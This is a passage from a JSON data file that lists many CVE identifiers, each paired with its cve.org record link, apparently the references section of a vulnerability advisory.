"url": "https://www.cve.org/CVERecord?id=CVE-2023-53247"
},
{
"name": "CVE-2025-38042",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38042"
},
{
"name": "CVE-2025-22083",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22083"
},
{
"name": "CVE-2023-53829",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53829"
},
{
"name": "CVE-2025-58183",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-58183"
},
{
"name": "CVE-2025-59830",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-59830"
},
{
"name": "CVE-2023-54002",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54002"
},
{
"name": "CVE-2022-50550",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50550"
},
{
"name": "CVE-2022-0400",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-0400"
},
{
"name": "CVE-2022-49138",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49138"
},
{
"name": "CVE-2025-66199",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66199"
},
{
"name": "CVE-2024-42239",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42239"
},
{
"name": "CVE-2022-49359",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49359"
},
{
"name": "CVE-2025-68342",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68342"
},
{
"name": "CVE-2022-48673",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48673"
},
{
"name": "CVE-2022-50425",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50425"
},
{
"name": "CVE-2025-38201",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38201"
},
{
"name": "CVE-2024-39293",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39293"
},
{
"name": "CVE-2023-53008",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53008"
},
{
"name": "CVE-2025-38669",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38669"
},
{
"name": "CVE-2025-40137",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40137"
},
{
"name": "CVE-2023-54052",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54052"
},
{
"name": "CVE-2025-22107",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22107"
},
{
"name": "CVE-2024-38306",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38306"
},
{
"name": "CVE-2023-53733",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53733"
},
{
"name": "CVE-2025-37775",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37775"
},
{
"name": "CVE-2025-21682",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21682"
},
{
"name": "CVE-2023-1386",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-1386"
},
{
"name": "CVE-2024-35939",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35939"
},
{
"name": "CVE-2024-39298",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39298"
},
{
"name": "CVE-2024-56703",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56703"
},
{
"name": "CVE-2026-23098",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23098"
},
{
"name": "CVE-2023-53347",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53347"
},
{
"name": "CVE-2023-28374",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-28374"
},
{
"name": "CVE-2023-52926",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52926"
},
{
"name": "CVE-2026-32597",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-32597"
},
{
"name": "CVE-2025-68286",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68286"
},
{
"name": "CVE-2025-9231",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-9231"
},
{
"name": "CVE-2024-36921",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36921"
},
{
"name": "CVE-2025-40057",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40057"
},
{
"name": "CVE-2024-41050",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41050"
},
{
"name": "CVE-2026-25500",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-25500"
},
{
"name": "CVE-2024-26656",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26656"
},
{
"name": "CVE-2025-38520",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38520"
},
{
"name": "CVE-2025-27558",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27558"
},
{
"name": "CVE-2025-71094",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71094"
},
{
"name": "CVE-2026-21637",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-21637"
},
{
"name": "CVE-2024-35998",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35998"
},
{
"name": "CVE-2024-37891",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-37891"
},
{
"name": "CVE-2021-0076",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-0076"
},
{
"name": "CVE-2025-68788",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68788"
},
{
"name": "CVE-2024-58237",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58237"
},
{
"name": "CVE-2024-36909",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36909"
},
{
"name": "CVE-2024-42147",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42147"
},
{
"name": "CVE-2023-53529",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53529"
},
{
"name": "CVE-2024-50028",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50028"
},
{
"name": "CVE-2023-53042",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53042"
},
{
"name": "CVE-2022-50527",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50527"
},
{
"name": "CVE-2023-54280",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54280"
},
{
"name": "CVE-2025-21786",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21786"
},
{
"name": "CVE-2024-58094",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-58094"
},
{
"name": "CVE-2024-11187",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-11187"
},
{
"name": "CVE-2025-52534",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-52534"
},
{
"name": "CVE-2025-40314",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40314"
},
{
"name": "CVE-2024-46705",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46705"
},
{
"name": "CVE-2022-50407",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50407"
},
{
"name": "CVE-2026-23196",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23196"
},
{
"name": "CVE-2024-26595",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26595"
},
{
"name": "CVE-2022-23825",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23825"
},
{
"name": "CVE-2024-45775",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45775"
},
{
"name": "CVE-2025-40306",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40306"
},
{
"name": "CVE-2025-21881",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21881"
},
{
"name": "CVE-2022-49901",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49901"
},
{
"name": "CVE-2026-23126",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23126"
},
{
"name": "CVE-2025-38329",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38329"
},
{
"name": "CVE-2021-33096",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33096"
},
{
"name": "CVE-2022-50230",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50230"
},
{
"name": "CVE-2024-35949",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35949"
},
{
"name": "CVE-2025-39947",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39947"
},
{
"name": "CVE-2025-68778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68778"
},
{
"name": "CVE-2023-53588",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53588"
},
{
"name": "CVE-2024-41082",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41082"
},
{
"name": "CVE-2023-53685",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53685"
},
{
"name": "CVE-2025-5222",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-5222"
},
{
"name": "CVE-2025-23155",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-23155"
},
{
"name": "CVE-2026-23054",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23054"
},
{
"name": "CVE-2025-37870",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37870"
},
{
"name": "CVE-2025-40254",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40254"
},
{
"name": "CVE-2022-49533",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49533"
},
{
"name": "CVE-2024-42253",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42253"
},
{
"name": "CVE-2020-26557",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-26557"
},
{
"name": "CVE-2025-71064",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71064"
},
{
"name": "CVE-2023-54201",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54201"
},
{
"name": "CVE-2021-33114",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-33114"
},
{
"name": "CVE-2025-69645",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69645"
},
{
"name": "CVE-2025-68200",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68200"
},
{
"name": "CVE-2022-49518",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49518"
},
{
"name": "CVE-2024-56727",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56727"
},
{
"name": "CVE-2022-49125",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49125"
},
{
"name": "CVE-2024-36900",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36900"
},
{
"name": "CVE-2025-38501",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38501"
},
{
"name": "CVE-2024-26866",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26866"
},
{
"name": "CVE-2024-27010",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27010"
},
{
"name": "CVE-2025-27516",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-27516"
},
{
"name": "CVE-2025-68736",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68736"
},
{
"name": "CVE-2023-52561",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52561"
},
{
"name": "CVE-2025-68725",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68725"
},
{
"name": "CVE-2024-3220",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-3220"
},
{
"name": "CVE-2024-53221",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53221"
},
{
"name": "CVE-2024-41069",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-41069"
},
{
"name": "CVE-2025-68176",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68176"
},
{
"name": "CVE-2025-37777",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37777"
},
{
"name": "CVE-2021-47432",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-47432"
},
{
"name": "CVE-2026-24734",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-24734"
},
{
"name": "CVE-2025-68204",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68204"
},
{
"name": "CVE-2024-35878",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35878"
},
{
"name": "CVE-2023-53362",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53362"
},
{
"name": "CVE-2025-68795",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68795"
},
{
"name": "CVE-2025-68349",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68349"
},
{
"name": "CVE-2024-26756",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26756"
},
{
"name": "CVE-2022-50815",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50815"
},
{
"name": "CVE-2025-21931",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21931"
},
{
"name": "CVE-2025-39826",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39826"
},
{
"name": "CVE-2025-38036",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38036"
},
{
"name": "CVE-2025-2668",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-2668"
},
{
"name": "CVE-2025-71221",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71221"
},
{
"name": "CVE-2025-37778",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37778"
},
{
"name": "CVE-2025-39716",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39716"
},
{
"name": "CVE-2024-46860",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46860"
},
{
"name": "CVE-2025-22040",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22040"
},
{
"name": "CVE-2024-53095",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-53095"
},
{
"name": "CVE-2025-22872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22872"
},
{
"name": "CVE-2025-8277",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8277"
},
{
"name": "CVE-2025-8941",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-8941"
},
{
"name": "CVE-2022-38457",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-38457"
},
{
"name": "CVE-2024-56665",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56665"
},
{
"name": "CVE-2025-38340",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38340"
},
{
"name": "CVE-2025-38109",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38109"
},
{
"name": "CVE-2023-53629",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53629"
},
{
"name": "CVE-2022-50178",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50178"
},
{
"name": "CVE-2025-39779",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39779"
},
{
"name": "CVE-2025-66866",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66866"
},
{
"name": "CVE-2025-68283",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68283"
},
{
"name": "CVE-2023-7216",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-7216"
},
{
"name": "CVE-2025-66614",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-66614"
},
{
"name": "CVE-2025-37880",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37880"
},
{
"name": "CVE-2025-36427",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36427"
},
{
"name": "CVE-2026-23217",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23217"
},
{
"name": "CVE-2025-15469",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-15469"
},
{
"name": "CVE-2025-37833",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37833"
},
{
"name": "CVE-2025-39761",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39761"
},
{
"name": "CVE-2024-38608",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38608"
},
{
"name": "CVE-2025-68246",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68246"
},
{
"name": "CVE-2025-68339",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68339"
},
{
"name": "CVE-2025-40287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40287"
},
{
"name": "CVE-2023-53320",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53320"
},
{
"name": "CVE-2024-44961",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44961"
},
{
"name": "CVE-2026-23069",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23069"
},
{
"name": "CVE-2025-21656",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21656"
},
{
"name": "CVE-2024-46835",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46835"
},
{
"name": "CVE-2025-69650",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69650"
},
{
"name": "CVE-2022-50554",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50554"
},
{
"name": "CVE-2023-53509",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53509"
},
{
"name": "CVE-2023-53421",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53421"
},
{
"name": "CVE-2025-11731",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-11731"
},
{
"name": "CVE-2026-22992",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-22992"
},
{
"name": "CVE-2024-52005",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52005"
},
{
"name": "CVE-2024-46775",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46775"
},
{
"name": "CVE-2025-39764",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39764"
},
{
"name": "CVE-2025-38207",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38207"
},
{
"name": "CVE-2022-49465",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49465"
},
{
"name": "CVE-2026-23004",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23004"
},
{
"name": "CVE-2024-26807",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26807"
},
{
"name": "CVE-2025-39720",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39720"
},
{
"name": "CVE-2023-54271",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54271"
},
{
"name": "CVE-2022-49742",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49742"
},
{
"name": "CVE-2025-71191",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71191"
},
{
"name": "CVE-2025-68295",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68295"
},
{
"name": "CVE-2025-68728",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68728"
},
{
"name": "CVE-2025-40780",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40780"
},
{
"name": "CVE-2025-68364",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68364"
},
{
"name": "CVE-2024-42118",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-42118"
},
{
"name": "CVE-2025-40100",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40100"
},
{
"name": "CVE-2026-1965",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1965"
},
{
"name": "CVE-2024-52560",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-52560"
},
{
"name": "CVE-2024-56604",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56604"
},
{
"name": "CVE-2026-23227",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23227"
},
{
"name": "CVE-2025-71087",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71087"
},
{
"name": "CVE-2023-37920",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-37920"
},
{
"name": "CVE-2023-52653",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52653"
},
{
"name": "CVE-2025-40285",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40285"
},
{
"name": "CVE-2023-52508",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-52508"
},
{
"name": "CVE-2025-69647",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69647"
},
{
"name": "CVE-2025-39827",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39827"
},
{
"name": "CVE-2024-50014",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50014"
},
{
"name": "CVE-2022-49108",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49108"
},
{
"name": "CVE-2024-56677",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56677"
},
{
"name": "CVE-2025-38717",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38717"
},
{
"name": "CVE-2026-3497",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-3497"
},
{
"name": "CVE-2025-22019",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22019"
},
{
"name": "CVE-2025-0913",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-0913"
},
{
"name": "CVE-2025-40208",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40208"
},
{
"name": "CVE-2025-39746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39746"
},
{
"name": "CVE-2024-26767",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26767"
},
{
"name": "CVE-2025-21872",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21872"
},
{
"name": "CVE-2026-2219",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-2219"
},
{
"name": "CVE-2025-68287",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68287"
},
{
"name": "CVE-2025-40039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40039"
},
{
"name": "CVE-2025-38208",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38208"
},
{
"name": "CVE-2024-35926",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35926"
},
{
"name": "CVE-2024-27389",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-27389"
},
{
"name": "CVE-2024-26983",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26983"
},
{
"name": "CVE-2022-50627",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50627"
},
{
"name": "CVE-2024-50285",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50285"
},
{
"name": "CVE-2025-38099",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38099"
},
{
"name": "CVE-2025-38524",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38524"
},
{
"name": "CVE-2025-38029",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38029"
},
{
"name": "CVE-2022-49123",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49123"
},
{
"name": "CVE-2024-50289",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50289"
},
{
"name": "CVE-2023-53258",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53258"
},
{
"name": "CVE-2024-46813",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46813"
},
{
"name": "CVE-2024-38594",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-38594"
},
{
"name": "CVE-2025-47907",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-47907"
},
{
"name": "CVE-2024-47658",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47658"
},
{
"name": "CVE-2022-41409",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-41409"
},
{
"name": "CVE-2025-38096",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38096"
},
{
"name": "CVE-2024-48873",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-48873"
},
{
"name": "CVE-2025-68746",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68746"
},
{
"name": "CVE-2024-12797",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-12797"
},
{
"name": "CVE-2023-53429",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53429"
},
{
"name": "CVE-2024-46765",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-46765"
},
{
"name": "CVE-2022-50380",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50380"
},
{
"name": "CVE-2025-12084",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-12084"
},
{
"name": "CVE-2025-38039",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38039"
},
{
"name": "CVE-2022-48990",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48990"
},
{
"name": "CVE-2024-24864",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-24864"
},
{
"name": "CVE-2024-35832",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35832"
},
{
"name": "CVE-2024-36479",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-36479"
},
{
"name": "CVE-2025-71133",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71133"
},
{
"name": "CVE-2026-23220",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23220"
},
{
"name": "CVE-2024-45782",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-45782"
},
{
"name": "CVE-2022-50785",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-50785"
},
{
"name": "CVE-2025-39745",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39745"
},
{
"name": "CVE-2024-35799",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-35799"
},
{
"name": "CVE-2025-40103",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40103"
},
{
"name": "CVE-2026-23020",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23020"
},
{
"name": "CVE-2025-38595",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38595"
},
{
"name": "CVE-2025-71223",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-71223"
},
{
"name": "CVE-2025-36098",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-36098"
},
{
"name": "CVE-2025-68796",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68796"
},
{
"name": "CVE-2025-40016",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40016"
},
{
"name": "CVE-2023-53765",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53765"
},
{
"name": "CVE-2025-38626",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38626"
},
{
"name": "CVE-2025-40356",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40356"
},
{
"name": "CVE-2026-1642",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-1642"
},
{
"name": "CVE-2025-45582",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-45582"
},
{
"name": "CVE-2023-53325",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53325"
},
{
"name": "CVE-2025-21752",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21752"
},
{
"name": "CVE-2026-27138",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-27138"
},
{
"name": "CVE-2025-40312",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40312"
},
{
"name": "CVE-2025-37852",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-37852"
},
{
"name": "CVE-2025-68220",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68220"
},
{
"name": "CVE-2025-22125",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-22125"
},
{
"name": "CVE-2019-6293",
"url": "https://www.cve.org/CVERecord?id=CVE-2019-6293"
},
{
"name": "CVE-2024-26953",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-26953"
},
{
"name": "CVE-2024-39282",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-39282"
},
{
"name": "CVE-2025-21738",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21738"
},
{
"name": "CVE-2023-50868",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-50868"
},
{
"name": "CVE-2025-68302",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68302"
},
{
"name": "CVE-2024-50146",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50146"
},
{
"name": "CVE-2025-68238",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68238"
},
{
"name": "CVE-2024-56709",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-56709"
},
{
"name": "CVE-2025-38063",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-38063"
},
{
"name": "CVE-2025-68297",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68297"
},
{
"name": "CVE-2024-40975",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-40975"
},
{
"name": "CVE-2025-68175",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68175"
},
{
"name": "CVE-2025-6069",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-6069"
},
{
"name": "CVE-2023-3817",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-3817"
},
{
"name": "CVE-2023-54227",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-54227"
},
{
"name": "CVE-2023-46316",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-46316"
},
{
"name": "CVE-2024-47866",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-47866"
},
{
"name": "CVE-2024-44970",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-44970"
},
{
"name": "CVE-2022-49476",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-49476"
},
{
"name": "CVE-2023-53855",
"url": "https://www.cve.org/CVERecord?id=CVE-2023-53855"
},
{
"name": "CVE-2026-23208",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-23208"
},
{
"name": "CVE-2025-68804",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68804"
},
{
"name": "CVE-2025-39925",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-39925"
},
{
"name": "CVE-2025-68769",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68769"
},
{
"name": "CVE-2024-50286",
"url": "https://www.cve.org/CVERecord?id=CVE-2024-50286"
},
{
"name": "CVE-2025-40139",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-40139"
},
{
"name": "CVE-2025-68794",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-68794"
},
{
"name": "CVE-2025-21768",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-21768"
},
{
"name": "CVE-2022-48667",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-48667"
},
{
"name": "CVE-2025-69419",
"url": "https://www.cve.org/CVERecord?id=CVE-2025-69419"
},
{
"name": "CVE-2024-56744",
